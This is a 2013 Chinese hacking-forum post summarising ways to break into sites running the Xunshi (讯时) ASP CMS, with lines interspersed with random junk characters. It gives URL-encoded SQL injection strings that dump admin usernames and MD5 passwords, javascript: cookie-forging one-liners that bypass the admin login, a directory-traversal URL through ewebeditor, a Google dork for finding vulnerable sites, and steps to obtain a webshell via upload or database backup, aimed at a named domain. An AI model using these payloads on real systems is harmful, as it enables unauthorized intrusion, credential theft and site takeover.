找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3074|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
" b- \1 _  ]  o9 _) D/ p8 I& ?- _; j1 q9 `  K3 ?& w9 D
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)! H- Z  U+ {. W% f$ H* N
% P+ }7 P. i! m3 `' ]/ O0 V
以下本文总结来自黑防去年第9期杂志上的内容..., M; y: a& M$ b6 ]
& u; x/ x# H0 |+ b- Y
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%$ w6 S5 q' d) K. G
2 c* r3 j- j$ s: U
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 2 H2 l; ^1 z0 Z4 Z; {5 o' {
9 X, _5 H9 y; f: d# e( P
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况5 r" c+ r( J& O& @
这里一个注入
; m5 U4 C$ L( G
: j8 x9 ^6 L) [" [$ _6 O效果如图:
% j5 d+ i1 Z' `3 T/ K' R5 s6 v( _  [5 n* o  m

7 N+ _5 e; b& R6 @( |: _5 l/ a# {3 m( t$ @* }
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.6 R" T% g. C" a2 U; x. f

* x* N: N% u5 }' w6 O( V密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去+ |' C! h( {' U- |7 q

. H3 w0 r! `. d( L# K9 Djavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));  k$ o% R- @* ^' D, E% n

' V* U( x  ?. K6 V( |8 ?那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:8 y+ y2 ]8 ]2 O" g5 w
4 @  n4 ]+ q/ i. W* ~: T' q8 b
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞+ D% U% B3 m" ]+ e
1 M+ v' ]2 f' m
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
: q: Z; I$ I; t/ U0 @5 }! j, P% W3 Q; C
访问这页面来列目录..步骤如下:
% W3 d, K9 F# U6 H  F# H1 R
- k1 `! ^, g- @6 L$ ]; C# sjavascript:alert(document.cookie="admindj=1")
/ w8 n* [1 |0 h1 {7 N) v! W( h
! `6 Q; k$ T# Yhttp://www.political-security.co ... asp?id=46&dir=../..
4 L% |- K- j# K2 X: }6 z) `+ i
& X( s3 R6 P3 q$ `( |" l" d效果如图:
2 R' w" d: A% G
2 N+ |* U* E( ~! z  ?' J4 ]  f 1 O; r* A3 K# C6 L
- Q- t6 I1 B  E; ]
这样全站目录都能瞧了..找到后台目录..进去..! v+ {7 K8 h3 ^2 d2 G( {

# E' I) F2 @# H3 B( n4 _$ U! t那么进了后台怎么拿shell??上传--备份就ok了..1 q3 ?( ?' w4 b6 ?6 U" ~5 @
2 S! E$ Q% Z  ~: d) N
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
; u, ?  E/ `, R9 U! c1 {' `: R! _" G4 Z2 I3 L# y
这个我也碰到过一次..你都可以通过列目录来实现..# o5 J7 ]; H, M

8 e- z, O  y2 ~5 y5 n7 yjavascript:alert(document.cookie="admindj=1")
6 T5 b9 [) J& h. }- e  P0 _" z5 f) V  V
http://www.political-security.co ... p?action=BackupData
9 D( ^7 Z" U# S* T
0 {% I5 D- u$ h+ G备份ok..* b2 @$ W$ K3 n% x  U" \
4 P3 w3 r" G7 p
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
2 Z+ n3 ?9 i0 f, h4 L4 t1 m' @  t* Q' L+ q, a6 {$ C1 ?7 M
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下$ u* k  K0 b3 p4 p0 y/ s' _& v& o* `7 f

! L" y9 C' G9 W" H# d  ^. H然后访问此页面进行注入..步骤如下:
7 W6 X  Z/ t1 q' O/ ?0 L4 y
6 S7 O* F, p( l; x- K" bjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
( H0 J9 a  r# T/ Y
/ }7 \: h1 W; e( C1 U* @3 K' l然后请求admin/admin_chk.asp页面7 ~! K! Y' ]3 \2 h  X% \9 W8 b5 z% r
: D# V/ S* @1 p0 p0 d# b0 q
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
* b9 J" b( D4 F9 e( ?+ Q+ e
) c0 w) ^, k: C0 d1 Q! \26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin6 y" H' g" E3 u- k
+ L! C. e& j- H
效果如图所示:: Z# @" a" j: a3 _; x! c7 T

2 N) L' K  A/ A1 _) j* b
/ \; e6 J2 z+ g+ O1 C) U( h2 A- L2 E% ~  {/ u. W$ J
讯时漏洞2
0 S4 t: V# i) j0 z* agoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
5 ^. z: R1 N) _$ `9 p! Z + u  C' f  m2 e
1、/admin/admin_news_pl_view.asp?id=1! n# f' R0 h  Q; f
//id任意 填入以下语句
1 @7 ]$ M4 }* A/ D* n: N" K1 S
0 W& T0 a* N$ G! J2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
* C! C% y. o/ L! x2 S' |# ~ 2 S! r/ g# r% ?7 Q2 I$ S$ a

7 a% ^; ^( v; T) K, _
; b# ~& U! k. I3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=': `+ A3 {1 G- _5 E2 i, Z

: p! d( `0 C& ^; P$ S- q! r% _8 Y5 y8 g

/ l! @' a1 U) s/ k$ U$ T2 i( g爆出管理员帐号和密码了8 E0 X* g4 w0 m9 L
  F; V* A3 a/ f" J2 @9 N! j
* p2 P0 z# s# ^5 x+ @9 b- ~
( Z/ u" A( ?, d% O! i0 }6 z
4、cookies进后台/ n8 X1 C' r) M+ g

+ |2 ], J/ A  w0 Q1 hjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));* m2 A6 o! e/ }* {+ Y6 G

; k, u) I4 G9 T5 p- f1 r0 ?, c6 d6 ?3 \, p1 M, Z
& Z+ G3 K" k. ~
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!% t/ I1 ]0 F3 ]7 f

1 G7 w* c7 o3 ^/ B! m
* w* j- z: e/ x
7 n3 Z, V- g& m( z6、后台有上传和备份取SHELL不难。
& e0 U0 j9 t$ L( h- z. Z; F5 A 1 L2 Y0 e) f2 |( f
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..0 c2 m! o. g+ k! n
4 Y! {9 i. M$ N" N1 k7 C# S5 V
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!# U* I1 g4 R, ]  u* ~$ h. D
. T) Q3 k& [( {3 ^" `0 l9 k. V* i

; d4 F8 q( a9 [
! T3 P& {7 f7 [8 q- _; Y5 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表